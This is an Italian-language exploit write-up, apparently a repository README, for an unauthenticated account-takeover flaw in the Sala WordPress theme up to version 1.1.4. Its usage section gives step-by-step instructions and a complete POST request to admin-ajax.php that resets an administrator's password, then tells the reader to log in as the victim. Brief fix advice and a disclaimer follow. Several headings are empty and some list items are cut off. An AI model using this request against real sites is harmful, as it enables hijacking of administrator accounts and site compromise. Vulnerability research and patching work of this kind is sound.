
Sala - Theme WordPress per Startup & SaaS <= 1.1.4 - Escalation di privilegi non autenticata tramite reset password/account takeover
🔥 Riepilogo della Vulnerabilità
Il tema WordPress Sala versioni <= 1.1.4 è vulnerabile a una vulnerabilità di escalation dei privilegi non autenticata. Questo difetto consente ad attaccanti non autenticati di reimpostare le password di utenti arbitrari — inclusi gli amministratori — invocando direttamente un endpoint AJAX esposto senza verificare l'identità del richiedente.
Questa vulnerabilità deriva dalla funzione change_password_ajax registrata su wp_ajax_nopriv_, che imposta una nuova password per qualsiasi login utente valido senza verificare se la richiesta è autorizzata.
🔍 Tema Affetto
🧪 Caratteristiche dell'Exploit
/wp-admin/admin-ajax.php?action=change_password_ajax🧠 Ricercatore
🚀 Utilizzo
Identifica un nome utente valido sul sito WordPress di destinazione. Puoi farlo controllando:
/author/username)Crea la seguente richiesta POST per reimpostare la password dell’utente:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: targetsite.com
Content-Type: application/x-www-form-urlencoded
action=change_password_ajax&login=admin&new_password=hacked123
Se ha successo, ora puoi accedere come utente target usando la nuova password (hacked123 nell'esempio sopra).
Visita /wp-login.php e verifica l'accesso.
🛠 Raccomandazioni per la Correzione
wp_ajax_nopriv_change_password_ajax.is_user_logged_in() e verificare l'identità dell'utente prima di consentire azioni sensibili.🔒 Dichiarazione di esclusione di responsabilità:
Queste informazioni sono fornite solo a scopo educativo e per test di penetrazione autorizzati. Lo sfruttamento non autorizzato dei sistemi è illegale e non etico.
📚 Riferimento: